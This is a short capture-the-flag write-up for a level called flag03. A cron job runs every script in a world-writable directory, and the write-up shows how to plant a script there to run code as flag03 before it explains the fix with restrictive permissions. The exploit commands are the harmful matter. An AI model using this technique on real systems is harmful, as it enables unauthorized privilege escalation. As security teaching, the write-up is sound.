- Usage of lazy permissions!
This level uses a workflow to do some work. Within this workflow a cronjob is run every couple of minutes running every script inside a world writable folder. Any script inside that folder, put there by any user, will eventually get executed using the rights of
There is a file called
writable.sh and a directory called
writable.d inside the directory
As one can see, the script iterates over every file in the folder
/home/flag03/writable.d and executes it.
ulimit -t 5 gives the script 5 seconds of cpu-time for each execution to do whatever the script is doing.
Create a file
foo inside that directory:
echo 'getflag >/tmp/flag03' > /home/flag03/writable.d/foo
Wait until the file has been executed and look for the flag:
while [[ ! -f /tmp/flag03 ]] ; do echo -n . ; sleep 1 ; done ; echo 'win!!!' cat /tmp/flag03
Lesson / How to fix
- Use restrict permissions!
In this workflow any user may serve a script, that is eventually executed in the name of
flag03. One should always know who is involved into a workflow and what these persone/entities can do.
In order to secure this level, use restrict permissions! I repeat, as this is really important! Do not use default permit, i.e. letting everybody do anything in the name of
flag03 (in this case)!
chmod 0750 /home/flag03/writable.d